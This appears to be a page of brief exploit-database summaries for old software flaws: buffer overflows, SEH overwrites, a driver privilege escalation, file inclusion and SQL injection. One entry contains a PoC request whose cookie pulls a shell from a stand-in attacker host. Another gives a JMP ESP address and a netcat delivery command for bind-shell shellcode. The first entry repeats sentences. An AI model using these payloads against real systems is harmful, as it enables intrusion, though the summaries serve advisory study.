A stack-based buffer overflow vulnerability exists in MediaCoder 0.6.2.4275. An attacker can exploit this vulnerability to execute arbitrary code in the context of the application. The vulnerability is due to a boundary error when handling specially crafted .m3u files. An attacker can exploit this vulnerability to execute arbitrary code in the context of the application. The vulnerability is due to a boundary error when handling specially crafted .m3u files.
RadASM 2.2.1.5 is vulnerable to a local stack overflow vulnerability. This vulnerability is caused due to a boundary error when handling .RAP files. By exploiting this vulnerability, an attacker can execute arbitrary code on the vulnerable system with the privileges of the user running the application.
This exploit is for EO Video v1.36 PlayList. It is a SEH overwrite exploit which is used to overwrite the SEH handler and execute malicious code. It was discovered by j0rgan and tested on Windows XP SP2 (Fr). It is written in Python language.
The driver contains a vulnerability that allows local users to gain elevated privileges. The vulnerability is caused due to an error in the driver when handling IOCTL 0x80102044. A local user can exploit this vulnerability to gain elevated privileges on the system.
This exploit is a buffer overflow vulnerability in Realtek Sound Manager 1.15.0.0. It allows an attacker to overwrite the SEH handler and execute arbitrary code. The exploit was tested on Windows XP SP2 (Fr).
This exploit is tested on Windows XP SP3 and uses JMP ESP from user32.dll, 0x7E429353. Shellcode is bind 4444 from Metasploit. The exploit can be run using the command 'nc host port < belkin-buldog-exploit'.
The engine of this cms makes site files (index.php, etc) with code like: if (!isset($GLOBALS['binn_include_path'])) $GLOBALS['binn_include_path'] = '';...include_once($GLOBALS['binn_include_path'].'prog/pl_menu/show_menu.php');...If register_globals=On, attacker can write remote url (if allow_url_fopen=On) or local path into variable binn_include_path. PoC: GET /index.php HTTP/1.1 Host: www.site.com Cookie: binn_include_path=http://evil.site.com/shell.txt?
OneOrZero Helpdesk and Task Management System is vulnerable to a Local File Inclusion vulnerability due to insufficient sanitization of user-supplied input. This vulnerability allows an attacker to include a file from the local system, which can lead to the disclosure of sensitive information. The vulnerable code is located in the './oozv1657/common/login.php' file, line 104.
The vulnerability exists due to insufficient sanitization of user-supplied input passed via the 'id' parameter to '/isiAJAX/ejemplo/paises.php' script. A remote attacker can execute arbitrary SQL commands in application's database, cause denial of service, access or modify sensitive data, exploit various vulnerabilities in the underlying SQL server software, etc.
BlueEye CMS version 1.0.0 and prior is vulnerable to a remote cookie SQL injection vulnerability. The vulnerability exists due to insufficient sanitization of user-supplied input in the 'BlueEyeCMS_login' cookie parameter. An attacker can exploit this vulnerability to gain access to the application and execute arbitrary SQL queries in the back-end database.
Services By CQR